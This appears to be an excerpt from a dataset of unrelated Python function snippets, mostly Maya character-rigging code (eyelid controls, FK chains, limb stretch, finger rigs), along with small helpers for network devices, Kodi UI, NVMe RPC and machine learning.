lf_lid01_do01_adn + '.input1', f=True)\n cmds.setAttr(lf_lid01_do01_adn + '.input2', 1.0)\n cmds.connectAttr(lf_lid01_do01_adn + '.output', lf_lidrails + '.offsetbottom[3].offsetbottom_Position', f=True)\n cmds.connectAttr(lf_dn[3] + '.ty', lf_dn02_rvn + '.inputY')\n cmds.connectAttr(lf_dn02_rvn + '.outputY', lf_lidrails + '.offsetbottom[3].offsetbottom_FloatValue', f=True)\n\n # rt_up =========\n\n # inner\n rt_lid01_ui01_asn = cmds.createNode('plusMinusAverage', n='rt_lid01_ui01_plusMinusAverage')\n cmds.setAttr(rt_lid01_ui01_asn + '.input1D[0]', 1.0)\n cmds.connectAttr(rt_up[0] + '.tx', rt_lid01_ui01_asn + '.input1D[1]', f=True)\n cmds.connectAttr(rt_lid01_ui01_asn + '.output1D', rt_lidrails + '.offsettop[3].offsettop_Position', f=True)\n cmds.connectAttr(rt_up[0] + '.ty', rt_lidrails + '.offsettop[3].offsettop_FloatValue', f=True)\n # mid -inner\n rt_lid01_um01_mdn = cmds.createNode('multDoubleLinear', n='rt_lid01_um01_multDoubleLinear')\n rt_lid01_um01_adn = cmds.createNode('addDoubleLinear', n='rt_lid01_um01_addDoubleLinear')\n cmds.connectAttr(rt_up[2] + '.tx', rt_lid01_um01_mdn + '.input1', f=True)\n cmds.setAttr(rt_lid01_um01_mdn + '.input2', -1.0)\n cmds.connectAttr(rt_lid01_um01_mdn + '.output', rt_lid01_um01_adn + '.input1', f=True)\n cmds.setAttr(rt_lid01_um01_adn + '.input2', 0.333)\n cmds.connectAttr(rt_lid01_um01_adn + '.output', rt_lidrails + '.offsettop[2].offsettop_Position', f=True)\n cmds.connectAttr(rt_up[2] + '.ty', rt_lidrails + '.offsettop[2].offsettop_FloatValue', f=True)\n\n # mid - outer\n rt_lid01_um02_mdn = cmds.createNode('multDoubleLinear', n='rt_lid01_um02_multDoubleLinear')\n rt_lid01_um02_adn = cmds.createNode('addDoubleLinear', n='rt_lid01_um02_addDoubleLinear')\n cmds.connectAttr(rt_up[1] + '.tx', rt_lid01_um02_mdn + '.input1', f=True)\n cmds.setAttr(rt_lid01_um02_mdn + '.input2', -1.0)\n cmds.connectAttr(rt_lid01_um02_mdn + '.output', rt_lid01_um02_adn + '.input1', f=True)\n cmds.setAttr(rt_lid01_um02_adn + '.input2', 0.666)\n cmds.connectAttr(rt_lid01_um02_adn + '.output', rt_lidrails + '.offsettop[1].offsettop_Position', f=True)\n cmds.connectAttr(rt_up[1] + '.ty', rt_lidrails + '.offsettop[1].offsettop_FloatValue', f=True)\n\n # outer\n rt_lid01_uo_mdn = cmds.createNode('multDoubleLinear', n='rt_lid01_uo_multDoubleLinear')\n cmds.connectAttr(rt_up[3] + '.tx', rt_lid01_uo_mdn + '.input1', f=True)\n cmds.setAttr(rt_lid01_uo_mdn + '.input2', -1.0)\n cmds.connectAttr(rt_lid01_uo_mdn + '.output', rt_lidrails + '.offsettop[0].offsettop_Position', f=True)\n cmds.connectAttr(rt_up[3] + '.ty', rt_lidrails + '.offsettop[0].offsettop_FloatValue', f=True)\n\n # rt_dn =========\n\n rt_dn_rvn = cmds.createNode('reverse', n='rt_lid01_dn01_reverse')\n rt_dn02_rvn = cmds.createNode('reverse', n='rt_lid01_dn02_reverse')\n # inner\n rt_lid01_di01_asn = cmds.createNode('plusMinusAverage', n='rt_lid01_di01_plusMinusAverage')\n cmds.setAttr(rt_lid01_di01_asn + '.operation', 2)\n cmds.setAttr(rt_lid01_di01_asn + '.input1D[0]', 1.0)\n cmds.connectAttr(rt_dn[0] + '.tx', rt_lid01_di01_asn + '.input1D[1]', f=True)\n cmds.connectAttr(rt_lid01_di01_asn + '.output1D', rt_lidrails + '.offsetbottom[0].offsetbottom_Position', f=True)\n cmds.connectAttr(rt_dn[0] + '.ty', rt_dn_rvn + '.inputX', f=True)\n cmds.connectAttr(rt_dn_rvn + '.outputX', rt_lidrails + '.offsetbottom[0].offsetbottom_FloatValue', f=True)\n # mid - inner\n rt_lid01_dm01_asn = cmds.createNode('plusMinusAverage', n='rt_lid01_dm01_plusMinusAverage')\n cmds.setAttr(rt_lid01_dm01_asn + '.operation', 2)\n cmds.setAttr(rt_lid01_dm01_asn + '.input1D[0]', 0.333)\n cmds.connectAttr(rt_dn[2] + '.tx', rt_lid01_dm01_asn + '.input1D[1]', f=True)\n cmds.connectAttr(rt_lid01_dm01_asn + '.output1D', rt_lidrails + '.offsetbottom[1].offsetbottom_Position', f=True)\n cmds.connectAttr(rt_dn[2] + '.ty', rt_dn_rvn + '.inputY', f=True)\n cmds.connectAttr(rt_dn_rvn + '.outputY', rt_lidrails + '.offsetbottom[1].offsetbottom_FloatValue', f=True)\n # mid - outer\n rt_lid01_dm02_asn = cmds.createNode('plusMinusAverage', n='rt_lid01_dm02_plusMinusAverage')\n cmds.setAttr(rt_lid01_dm02_asn + '.operation', 2)\n cmds.setAttr(rt_lid01_dm02_asn + '.input1D[0]', 0.666)\n cmds.connectAttr(rt_dn[1] + '.tx', rt_lid01_dm02_asn + '.input1D[1]', f=True)\n cmds.connectAttr(rt_lid01_dm02_asn + '.output1D', rt_lidrails + '.offsetbottom[2].offsetbottom_Position', f=True)\n cmds.connectAttr(rt_dn[1] + '.ty', rt_dn02_rvn + '.inputX', f=True)\n cmds.connectAttr(rt_dn02_rvn + '.outputX', rt_lidrails + '.offsetbottom[2].offsetbottom_FloatValue', f=True)\n # outer\n rt_lid01_do01_mdn = cmds.createNode('multDoubleLinear', n='rt_lid01_do01_multDoubleLinear')\n cmds.connectAttr(rt_dn[3] + '.tx', rt_lid01_do01_mdn + '.input1', f=True)\n cmds.setAttr(rt_lid01_do01_mdn + '.input2', -1.0)\n cmds.connectAttr(rt_lid01_do01_mdn + '.output', rt_lidrails + '.offsetbottom[3].offsetbottom_Position', f=True)\n cmds.connectAttr(rt_dn[3] + '.ty', rt_dn02_rvn + '.inputY', f=True)\n cmds.connectAttr(rt_dn02_rvn + '.outputY', rt_lidrails + '.offsetbottom[3].offsetbottom_FloatValue')", "def bdev_nvme_enable_controller(client, name, cntlid):\n\n params = {'name': name}\n\n if cntlid is not None:\n params['cntlid'] = cntlid\n\n return client.call('bdev_nvme_enable_controller', params)", "def _add_switch(self, label, id, orientation=0, return_switch=True):\n switch = ArduinoSwitchControlSwitch(label, id,\n orientation=orientation)\n self.switch_ids[id] = switch\n self.switches[label] = switch\n\n if return_switch:\n return switch", "def __init__(self, contr: widgets.base_controller,\n parent: widgets.base_widget,\n idstr: str,\n attrdct: dict,\n jsel,\n titletext: str,\n helptext: str) -> None:\n super().__init__(contr, parent, idstr, attrdct, jsel)\n self.wcstatus: wcstatus.WCstatus = contr.wcstatus\n self.addClass(\"w3-container\")\n self.addClass('switchview-cls')\n self.setAttribute('height', '80%')\n self.setAttribute('width', '100%')\n self.h1 = html.h1text(self, titletext)\n help_attrdct = {'class': 'w3-container'}\n self.helptext = html.spanhelptext(self, \"addhelptext\", help_attrdct, helptext)", "def connectCns(cnxDict, nsRig=None, nsSkin=None):\n for i, jnt in enumerate(cnxDict[\"joints\"]):\n if nsSkin:\n oJnt = pm.PyNode(nsSkin + \":\" + jnt)\n else:\n oJnt = pm.PyNode(jnt)\n\n if cnxDict[\"attrs\"][i][0]:\n if nsRig:\n oAttr = pm.PyNode(nsRig + \":\" + cnxDict[\"attrs\"][i][0])\n else:\n oAttr = pm.PyNode(cnxDict[\"attrs\"][i][0])\n\n oNode = oAttr.node()\n oTrans = pm.listConnections(\n pm.listConnections(oNode.inputMatrix)[0].matrixIn[0])\n pm.parentConstraint(oTrans, oJnt, mo=True)\n pm.scaleConstraint(oTrans, oJnt, mo=True)", "def add_a_keyable_attribute(myObj, oDataType, oParamName, oMin=None, oMax=None, oDefault=0.0):\r\n oFullName = '.'.join( [str(myObj),oParamName] )\r\n if pm.objExists(oFullName):\r\n return pm.PyNode(oFullName)\r\n else:\r\n myObj.addAttr(oParamName, at=oDataType, keyable=True, dv=oDefault)\r\n myAttr = pm.PyNode(myObj + '.' + oParamName)\r\n if oMin != None:\r\n myAttr.setMin(oMin)\r\n if oMax != None:\r\n myAttr.setMax(oMax)\r\n pm.setAttr(myAttr, e=True, channelBox=True)\r\n pm.setAttr(myAttr, e=True, keyable=True)\r\n return myAttr", "def label_joints():\n side_dict = {'C': 0,\n 'L': 1,\n 'R': 2}\n for jnt in mc.ls(type='joint'):\n mc.setAttr('{}.side'.format(jnt), side_dict[jnt.split('_')[0]])\n mc.setAttr('{}.type'.format(jnt), 18)\n mc.setAttr('{}.otherType'.format(jnt), jnt.split('_')[1], type=\"string\")", "def inchi_to_inchi_key(ich):\n ick = _rd_chem.inchi.InchiToInchiKey(ich)\n return ick", "def LabelDisks(self):\n pass", "def setup_threeCtrl(lf_lidrails, rt_lidrails):\n # Declare control variables\n lf_up = ['lf_lid01_tp01_ccc', 'lf_lid01_tp02_ccc', 'lf_lid01_tp03_ccc']\n lf_dn = ['lf_lid01_dn01_ccc', 'lf_lid01_dn02_ccc', 'lf_lid01_dn03_ccc']\n rt_up = ['rt_lid01_tp01_ccc', 'rt_lid01_tp02_ccc', 'rt_lid01_tp03_ccc']\n rt_dn = ['rt_lid01_dn01_ccc', 'rt_lid01_dn02_ccc', 'rt_lid01_dn03_ccc']\n\n # Connect lidRails ramps to lid profile controls\n\n # ========\n # lf_up\n\n # inner\n cmds.connectAttr(lf_up[0] + '.tx', lf_lidrails + '.offsettop[0].offsettop_Position', f=True)\n cmds.connectAttr(lf_up[0] + '.ty', lf_lidrails + '.offsettop[0].offsettop_FloatValue', f=True)\n # mid\n lf_lid01_um01_adn = cmds.createNode('addDoubleLinear', n='lf_lid01_um01_addDoubleLinear')\n cmds.connectAttr(lf_up[1] + '.tx', lf_lid01_um01_adn + '.input1', f=True)\n cmds.setAttr(lf_lid01_um01_adn + '.input2', 0.5)\n cmds.connectAttr(lf_lid01_um01_adn + '.output', lf_lidrails + '.offsettop[1].offsettop_Position', f=True)\n cmds.connectAttr(lf_up[1] + '.ty', lf_lidrails + '.offsettop[1].offsettop_FloatValue', f=True)\n # outer\n lf_lid01_uo01_adn = cmds.createNode('addDoubleLinear', n='lf_lid01_uo01_addDoubleLinear')\n cmds.connectAttr(lf_up[2] + '.tx', lf_lid01_uo01_adn + '.input1', f=True)\n cmds.setAttr(lf_lid01_uo01_adn + '.input2', 1.0)\n cmds.connectAttr(lf_lid01_uo01_adn + '.output', lf_lidrails + '.offsettop[2].offsettop_Position', f=True)\n cmds.connectAttr(lf_up[2] + '.ty', lf_lidrails + '.offsettop[2].offsettop_FloatValue', f=True)\n\n # ========\n # lf_dn\n\n # Reverse node\n lf_dn_rvn = cmds.createNode('reverse', n='lf_lid01_dn01_reverse')\n # inner\n cmds.connectAttr(lf_dn[0] + '.tx', lf_lidrails + '.offsetbottom[0].offsetbottom_Position', f=True)\n cmds.connectAttr(lf_dn[0] + '.ty', lf_dn_rvn + '.inputX', f=True)\n cmds.connectAttr(lf_dn_rvn + '.outputX', lf_lidrails + '.offsetbottom[0].offsetbottom_FloatValue', f=True)\n # mid\n lf_lid01_dm01_adn = cmds.createNode('addDoubleLinear', n='lf_lid01_dm01_addDoubleLinear')\n cmds.connectAttr(lf_dn[1] + '.tx', lf_lid01_dm01_adn + '.input1', f=True)\n cmds.setAttr(lf_lid01_dm01_adn + '.input2', 0.5)\n cmds.connectAttr(lf_lid01_dm01_adn + '.output', lf_lidrails + '.offsetbottom[1].offsetbottom_Position', f=True)\n cmds.connectAttr(lf_dn[1] + '.ty', lf_dn_rvn + '.inputY', f=True)\n cmds.connectAttr(lf_dn_rvn + '.outputY', lf_lidrails + '.offsetbottom[1].offsetbottom_FloatValue', f=True)\n # outer\n lf_lid01_do01_adn = cmds.createNode('addDoubleLinear', n='lf_lid01_do01_addDoubleLinear')\n cmds.connectAttr(lf_dn[2] + '.tx', lf_lid01_do01_adn + '.input1', f=True)\n cmds.setAttr(lf_lid01_do01_adn + '.input2', 1.0)\n cmds.connectAttr(lf_lid01_do01_adn + '.output', lf_lidrails + '.offsetbottom[2].offsetbottom_Position', f=True)\n cmds.connectAttr(lf_dn[2] + '.ty', lf_dn_rvn + '.inputZ', f=True)\n cmds.connectAttr(lf_dn_rvn + '.outputZ', lf_lidrails + '.offsetbottom[2].offsetbottom_FloatValue', f=True)\n\n # ========\n # rt_up\n\n # inner\n rt_lid01_ui01_asn = cmds.createNode('plusMinusAverage', n='rt_lid01_ui01_plusMinusAverage')\n cmds.setAttr(rt_lid01_ui01_asn + '.operation', 2)\n cmds.setAttr(rt_lid01_ui01_asn + '.input1D[0]', 1.0)\n cmds.connectAttr(rt_up[0] + '.tx', rt_lid01_ui01_asn + '.input1D[1]', f=True)\n cmds.connectAttr(rt_lid01_ui01_asn + '.output1D', rt_lidrails + '.offsettop[2].offsettop_Position', f=True)\n cmds.connectAttr(rt_up[0] + '.ty', rt_lidrails + '.offsettop[2].offsettop_FloatValue', f=True)\n # mid\n rt_lid01_um01_mdn = cmds.createNode('multDoubleLinear', n='rt_lid01_um01_multDoubleLinear')\n rt_lid01_um01_adn = cmds.createNode('addDoubleLinear', n='rt_lid01_um01_addDoubleLinear')\n cmds.connectAttr(rt_up[1] + '.tx', rt_lid01_um01_mdn + '.input1', f=True)\n cmds.setAttr(rt_lid01_um01_mdn + '.input2', -1.0)\n cmds.connectAttr(rt_lid01_um01_mdn + '.output', rt_lid01_um01_adn + '.input1', f=True)\n cmds.setAttr(rt_lid01_um01_adn + '.input2', 0.5)\n cmds.connectAttr(rt_lid01_um01_adn + '.output', rt_lidrails + '.offsettop[1].offsettop_Position', f=True)\n cmds.connectAttr(rt_up[1] + '.ty', rt_lidrails + '.offsettop[1].offsettop_FloatValue', f=True)\n # outer\n rt_lid01_uo_mdn = cmds.createNode('multDoubleLinear', n='rt_lid01_uo_multDoubleLinear')\n cmds.connectAttr(rt_up[2] + '.tx', rt_lid01_uo_mdn + '.input1', f=True)\n cmds.setAttr(rt_lid01_uo_mdn + '.input2', -1.0)\n cmds.connectAttr(rt_lid01_uo_mdn + '.output', rt_lidrails + '.offsettop[0].offsettop_Position', f=True)\n cmds.connectAttr(rt_up[2] + '.ty', rt_lidrails + '.offsettop[0].offsettop_FloatValue', f=True)\n\n # ========\n # rt_dn\n\n # Reverse node\n rt_dn_rvn = cmds.createNode('reverse', n='rt_lid01_dn01_reverse')\n # inner\n rt_lid01_di01_asn = cmds.createNode('plusMinusAverage', n='rt_lid01_di01_plusMinusAverage')\n cmds.setAttr(rt_lid01_di01_asn + '.operation', 2)\n cmds.setAttr(rt_lid01_di01_asn + '.input1D[0]', 1.0)\n cmds.connectAttr(rt_dn[0] + '.tx', rt_lid01_di01_asn + '.input1D[1]', f=True)\n cmds.connectAttr(rt_lid01_di01_asn + '.output1D', rt_lidrails + '.offsetbottom[0].offsetbottom_Position', f=True)\n cmds.connectAttr(rt_dn[0] + '.ty', rt_dn_rvn + '.inputX', f=True)\n cmds.connectAttr(rt_dn_rvn + '.outputX', rt_lidrails + '.offsetbottom[0].offsetbottom_FloatValue', f=True)\n # mid\n rt_lid01_dm01_asn = cmds.createNode('plusMinusAverage', n='rt_lid01_dm01_plusMinusAverage')\n cmds.setAttr(rt_lid01_dm01_asn + '.operation', 2)\n cmds.setAttr(rt_lid01_dm01_asn + '.input1D[0]', 0.5)\n cmds.connectAttr(rt_dn[1] + '.tx', rt_lid01_dm01_asn + '.input1D[1]', f=True)\n cmds.connectAttr(rt_lid01_dm01_asn + '.output1D', rt_lidrails + '.offsetbottom[1].offsetbottom_Position', f=True)\n cmds.connectAttr(rt_dn[1] + '.ty', rt_dn_rvn + '.inputY', f=True)\n cmds.connectAttr(rt_dn_rvn + '.outputY', rt_lidrails + '.offsetbottom[1].offsetbottom_FloatValue', f=True)\n # outer\n rt_lid01_do01_mdn = cmds.createNode('multDoubleLinear', n='rt_lid01_do01_multDoubleLinear')\n cmds.connectAttr(rt_dn[2] + '.tx', rt_lid01_do01_mdn + '.input1', f=True)\n cmds.setAttr(rt_lid01_do01_mdn + '.input2', -1.0)\n cmds.connectAttr(rt_lid01_do01_mdn + '.output', rt_lidrails + '.offsetbottom[2].offsetbottom_Position', f=True)\n cmds.connectAttr(rt_dn[2] + '.ty', rt_dn_rvn + '.inputZ', f=True)\n cmds.connectAttr(rt_dn_rvn + '.outputZ', rt_lidrails + '.offsetbottom[2].offsetbottom_FloatValue', f=True)", "def attrControlGrp(*args, annotation: Union[AnyStr, bool]=\"\", attribute: Union[name, bool]=None,\n changeCommand: Union[Script, bool]=None, enable: bool=True, exists:\n bool=True, handlesAttribute: Union[name, bool]=None, hideMapButton:\n bool=True, label: Union[AnyStr, bool]=\"\", preventOverride: bool=True, q=True,\n query=True, e=True, edit=True, **kwargs)->Union[AnyStr, Any]:\n pass", "def init_kern_act(num_pitches):\n\n kern_act = []\n\n for i in range(num_pitches):\n kern_act.append(Matern32(1, lengthscales=1.0, variance=3.5))\n return kern_act", "def build(\n baseRigData,\n handJnt,\n topFingJnts,\n prefix = 'new',\n ctrlScale = 1.0,\n doConstraintRot = False,\n enableFingerTranslate = True,\n withEndJoints = False\n ):\n \n # names\n side = name.getSide( prefix )\n \n #===========================================================================\n # module\n #===========================================================================\n \n rigmodule = module.Module( prefix )\n rigmodule.connect( baseRigData = baseRigData )\n rigmodule.parent( baseRigData = baseRigData )\n \n # make return directory\n \n fingerCtrls = [ None ] * 5\n \n for i, topJnt in enumerate( topFingJnts ):\n \n chainFingerJnts = joint.listHierarchy( topJnt, withEndJoints = withEndJoints )\n \n prefix = name.getBase( topJnt )\n \n fingerRigData = general.makeFkControlChain( chain = chainFingerJnts, \n prefix = prefix, \n scale = ctrlScale, \n connectR = True, \n connectT = enableFingerTranslate, \n useConstraints = doConstraintRot, \n constraintFirst = False, \n ctrlshape = 'circle', \n ctrlColorName = 'secondary', \n ctrlParent = rigmodule.Controls )\n \n\n\n mc.parentConstraint( handJnt, fingerRigData[0].Off, mo = True)\n\n fingerCtrls[i] = fingerRigData \n \n \n\n return {\n 'thumbControls': fingerCtrls[0],\n 'indexControls': fingerCtrls[1],\n 'middleControls': fingerCtrls[2],\n 'ringControls': fingerCtrls[3],\n 'pinkyControls': fingerCtrls[4],\n 'module':rigmodule\n }", "def create_netmiko_connection(self, opt):\n\n key = opt['ip']\n conn_list = ['None', 'None', 'None']\n net_connect_dict = self._netmiko_connection\n auth = (opt['username'], opt['password'])\n if key not in net_connect_dict:\n # case 1: No key create a connection\n try:\n net_connect = self._establish_netmiko_handler(opt, net_connect_dict)\n if net_connect:\n hashed_auth = self._hash_auth_string(auth)\n conn_list[0] = net_connect\n conn_list[1] = hashed_auth\n conn_list[2] = threading.Lock()\n net_connect_dict[key] = conn_list\n except ValueError as err:\n raise\n except Exception as err:\n raise\n\n else:\n existing_hash = net_connect_dict[key][1]\n conn_list = self._get_netmiko_connection(key)\n conn_obj = conn_list[0]\n if self._check_auth_string(existing_hash, auth):\n # case 2: check if connection object is alive\n if conn_obj.is_alive() is True:\n conn_obj.set_base_prompt()\n return\n # case 3: Assume user value is new so delete existing\n # and add new connection object for this\n else:\n #disconnect stale object\n conn_list[2].acquire()\n conn_obj.disconnect()\n conn_list[2].release()\n\n # Existing object is not valid so clear and create new\n # connection\n del net_connect_dict[key]\n try:\n net_connect = self._establish_netmiko_handler(opt, net_connect_dict)\n if net_connect:\n new_hash = self._hash_auth_string(auth)\n conn_list[0] = net_connect\n conn_list[1] = new_hash\n conn_list[2] = threading.Lock()\n net_connect_dict[key] = conn_list\n except ValueError as error:\n raise\n except Exception:\n raise Exception", "def __init__(\n self,\n data: ProtectData,\n device: ProtectAdoptableDeviceModel,\n description: ProtectSwitchEntityDescription,\n ) -> None:\n super().__init__(data, device, description)\n self._attr_name = f\"{self.device.display_name} {self.entity_description.name}\"\n self._switch_type = self.entity_description.key", "def create_fk_chain(controls, joints):\n\n # create control offset transforms\n constraints = []\n exp_tf_ms = []\n\n for ctl in controls:\n par = cmds.listRelatives(ctl, parent=True)\n buf = create_offset_transform(ctl, BUF)\n exp = create_offset_transform(ctl, EXP)\n off = create_offset_transform(ctl, OFF)\n\n cmds.parent(ctl, off)\n cmds.parent(off, exp)\n cmds.parent(exp, buf)\n if par: cmds.parent(buf, par[0])\n\n exp_tf_ms.append(buf)\n\n for src, trg in zip(controls, joints):\n # constrain fk joints to controls, hide the constraint nodes\n pc = cmds.parentConstraint(src, trg, mo=True)[0]\n cmds.setAttr('{node}.interpType'.format(node=pc), 2)\n cmds.setAttr('{node}.visibility'.format(node=pc), False)\n sc = cmds.scaleConstraint(src, trg)[0]\n cmds.setAttr('{node}.visibility'.format(node=sc), False)\n constraints.extend([pc, sc])\n\n return constraints, exp_tf_ms", "def knn_manage(k):\n\n xtrain, xtest, label_train, label_test = get_data()\n pred = knn_classify(xtrain, xtest, label_train, k)\n conf_mat, accuracy, misclassified = confusion_matrix_accuracy(pred, label_test)\n print accuracy\n print conf_mat", "def _aim_ctrl(self):\n y = 0\n z = 0\n\n if self.aim_axis == \"y\":\n z = 90\n elif self.aim_axis == \"z\":\n y = -90\n\n for shape in self.ctrl.getShapes():\n pm.rotate(shape.cv, 0, y, z, r=1)", "def multi_joint_stretch(ik_ctrl, ik_last_node, switch_ctrl, fk_ctrls, jnts, ik_handle):\n\n root_grp = utils.get_parent(jnts[0])\n stretch_jnts = jnts[1:]\n stretch_fk_ctrls = fk_ctrls[1:]\n\n # create attrs\n attrs = ['upStretch','loStretch']\n for i in reversed(range(len(stretch_jnts)-2)):\n ltr = ''\n if i > 0:\n ltr = utils.letters[i]\n\n attrs.insert(1, 'midStretch'+ltr)\n\n if not mc.objExists(ik_ctrl+'.autoStretch'):\n mc.addAttr(ik_ctrl, ln='autoStretch', at='double', min=0, max=1, k=1)\n\n for i in range(len(stretch_jnts)):\n if not mc.objExists(ik_ctrl+'.'+attrs[i]):\n mc.addAttr(ik_ctrl, ln=attrs[i], at='double', dv=1, min=0.001, k=1)\n\n for fk_ctrl in fk_ctrls[:-1]:\n if not mc.objExists(fk_ctrl+'.stretch'):\n mc.addAttr(fk_ctrl, ln='stretch', at='double', dv=1, min=0.001, k=1)\n\n # store initial length of joint\n init_lengths = [mc.getAttr(j+'.tx') for j in stretch_jnts]\n abs_init_lengths = [abs(v) for v in init_lengths]\n\n total_init_length = 0\n for v in init_lengths:\n total_init_length += v\n\n abs_total_init_length = abs(total_init_length)\n\n # Create dist reader\n root_to_end_dist = utils.create_distance_reader(root_grp, ik_last_node)\n\n auto_stretch_clamp = mc.createNode('clamp')\n mc.setAttr(auto_stretch_clamp+'.minR', 1)\n mc.setAttr(auto_stretch_clamp+'.maxR', 10000000)\n mc.connectAttr(root_to_end_dist+'.stretchFactor', auto_stretch_clamp+'.inputR')\n\n mc.addAttr(ik_ctrl, ln='stretchFactor', k=0)\n mc.connectAttr(auto_stretch_clamp+'.inputR', ik_ctrl+'.stretchFactor')\n\n pma = mc.createNode('plusMinusAverage')\n utils.connect_abs(pma+'.output1D', root_to_end_dist+'.jointChainLength')\n\n # handle soft ik handle constraint override\n pc = mc.pointConstraint(ik_last_node, ik_handle)[0]\n if mc.objExists(jnts[0]+'.softIkChainLength'):\n\n # compensate chain length - feed in new chain length for soft ik chain length\n utils.connect_abs(pma+'.output1D', jnts[0]+'.softIkChainLength')\n\n # blend off the soft ik constraint IF im in auto stretch\n mc.connectAttr(ik_ctrl+'.autoStretch', pc+'.w1')\n utils.connect_reverse(pc+'.w1', pc+'.w0')\n\n # easy stuff first - create fk stretch nodes\n fk_to_ik_blends = [] # This is the final output for IK stretch\n\n for i, jnt in enumerate(stretch_jnts):\n\n # easy stuff first - create fk stretch nodes\n fk_mdl = mc.createNode('multDoubleLinear')\n mc.setAttr(fk_mdl+'.input1', mc.getAttr(jnt+'.tx'))\n mc.connectAttr(fk_ctrls[i]+'.stretch', fk_mdl+'.input2')\n utils.connect_abs(fk_mdl+'.output', fk_ctrls[i+1]+'_ZERO.tx')\n\n # Create user secifed IK stretch\n user_ik_scale_mdl = mc.createNode('multDoubleLinear')\n mc.setAttr( user_ik_scale_mdl+'.input1', init_lengths[i])\n mc.connectAttr(ik_ctrl+'.'+attrs[i], user_ik_scale_mdl+'.input2')\n\n # Now create the IK auto stretch nodes\n auto_stretch_mdl = mc.createNode('multDoubleLinear')\n mc.connectAttr(user_ik_scale_mdl+'.output', auto_stretch_mdl+'.input1', f=1)\n mc.connectAttr(auto_stretch_clamp+'.outputR', auto_stretch_mdl+'.input2', f=1)\n mc.connectAttr(user_ik_scale_mdl+'.output', '{0}.input1D[{1}]'.format(pma, i))\n\n fk_to_ik_blend = mc.createNode('blendTwoAttr')\n auto_stretch_blend = mc.createNode('blendTwoAttr')\n\n mc.connectAttr(switch_ctrl+'.IK', fk_to_ik_blend+'.attributesBlender')\n mc.connectAttr(fk_mdl+'.output', fk_to_ik_blend+'.input[0]')\n mc.connectAttr(auto_stretch_blend+'.output', fk_to_ik_blend+'.input[1]')\n\n mc.connectAttr(ik_ctrl+'.autoStretch', auto_stretch_blend+'.attributesBlender')\n mc.connectAttr(user_ik_scale_mdl+'.output', auto_stretch_blend+'.input[0]')\n mc.connectAttr(auto_stretch_mdl+'.output', auto_stretch_blend+'.input[1]')\n\n fk_to_ik_blends.append(fk_to_ik_blend+'.output')\n\n for i, jnt in enumerate(stretch_jnts):\n mc.connectAttr(fk_to_ik_blends[i], jnt+'.tx')", "def handle_create_ai_view(self, dobject_id, dclass, fields):\n logger.debug(\"AIRepository {} has been made the controlling AI \"\n \"for dobject \\\"{}\\\"\".format(self.channel, dobject_id))\n # TODO: Well, create that AI view!\n pass", "def set_controls(self):\n # Image control\n image = pyxbmct.Image(addonfolder+artsfolder+'/k.png')\n self.placeControl(image, 0, 0, rowspan=8, columnspan=16)\n\n\t\t# KI Plus\n self.k1plus_button = pyxbmct.RadioButton('')\n self.placeControl(self.k1plus_button, 8, 1, rowspan=2, columnspan=4)\n self.connect(self.k1plus_button, self.k1plus_button_update)\n if tools.return_data('TVHWIZARD', 'STRING', 'k1plus', 2) == 1:\n self.k1plus_button.setSelected(True)\n else:\n self.k1plus_button.setSelected(False)\n k1plus = pyxbmct.Image(addonfolder+artsfolder+'/k1plus.png')\n self.placeControl(k1plus, 8, 1, rowspan=2, columnspan=4)\n\n\t\t# KI Pro\n self.k1pro_button = pyxbmct.RadioButton('')\n self.placeControl(self.k1pro_button, 11, 6, rowspan=2, columnspan=4)\n self.connect(self.k1pro_button, self.k1pro_button_update)\n if tools.return_data('TVHWIZARD', 'STRING', 'k1pro', 2) == 1:\n self.k1pro_button.setSelected(True)\n else:\n self.k1pro_button.setSelected(False)\n k1pro = pyxbmct.Image(addonfolder+artsfolder+'/k1pro.png')\n self.placeControl(k1pro, 11, 6, rowspan=2, columnspan=4)\n\n\t\t# KII Pro\n self.k2pro_button = pyxbmct.RadioButton('')\n self.placeControl(self.k2pro_button, 8, 6, rowspan=2, columnspan=4)\n self.connect(self.k2pro_button, self.k2pro_button_update)\n if tools.return_data('TVHWIZARD', 'STRING', 'k2pro', 2) == 1:\n self.k2pro_button.setSelected(True)\n else:\n self.k2pro_button.setSelected(False)\n k2pro = pyxbmct.Image(addonfolder+artsfolder+'/k2pro.png')\n self.placeControl(k2pro, 8, 6, rowspan=2, columnspan=4)\n\n\t\t# KIII Pro\n self.k3pro_button = pyxbmct.RadioButton('')\n self.placeControl(self.k3pro_button, 8, 11, rowspan=2, columnspan=4)\n self.connect(self.k3pro_button, self.k3pro_button_update)\n if tools.return_data('TVHWIZARD', 'STRING', 'k3pro', 2) == 1:\n self.k3pro_button.setSelected(True)\n else:\n self.k3pro_button.setSelected(False)\n k3pro = pyxbmct.Image(addonfolder+artsfolder+'/k3pro.png')\n self.placeControl(k3pro, 8, 11, rowspan=2, columnspan=4)\n\n\t\t# Close button\n self.close_button = pyxbmct.Button('Exit')\n self.placeControl(self.close_button, 13, 15, rowspan=1, columnspan=1)\n self.connect(self.close_button, lambda: self.closepage())", "def lnhattr(shape):\n\n arnold_nodes = ('rcurve', 'cwdth', 'srate', 'ai_curve_shaderr', 'ai_curve_shaderg', 'ai_curve_shaderb')\n for ar in arnold_nodes:\n cmds.setAttr(shape + \".\" + ar, l=True, k=False, cb=False)", "def dynamic_vnic_conn_policy_create(handle, name, descr=None, dynamic_eth=\"54\",\n adaptor_profile_name=None,\n protection=\"protected\",\n parent_dn=\"org-root\", **kwargs):\n\n from ucscsdk.mometa.vnic.VnicDynamicConPolicy import VnicDynamicConPolicy\n\n obj = handle.query_dn(parent_dn)\n if not obj:\n raise UcscOperationError(\"dynamic_vnic_conn_policy_create\",\n \"Org %s does not exist\" % parent_dn)\n\n mo = VnicDynamicConPolicy(parent_mo_or_dn=obj,\n name=name,\n descr=descr,\n dynamic_eth=dynamic_eth,\n protection=protection,\n adaptor_profile_name=adaptor_profile_name)\n\n mo.set_prop_multiple(**kwargs)\n\n handle.add_mo(mo, modify_present=True)\n handle.commit()\n return mo", "def __init__(self, kp, ki, kd, tolerance,\n saturation=None, max_integral=None, integral_fade=1.0):\n super().__init__()\n self.tolerance = tolerance\n self.controller = pidController(kp, ki, kd, saturation=saturation,\n max_integral=max_integral, integral_fade_rate=integral_fade)", "def connect_hooks():\n\n mc.refresh()\n\n if not mc.objExists('world_CTL'):\n return\n\n # Constrain ll hooks\n hook_node_attrs = mc.ls('*_'+utils.get_suffix('hook')+'.hookDriver')\n att_node_attrs = mc.ls('*_'+utils.get_suffix('attrDriver')+'.attrDriver')\n world_hook = mc.ls('*_worldRoot_*.allCtrlsVis')[0].split('.')[0]\n\n for attr in hook_node_attrs:\n print 'Connecting: 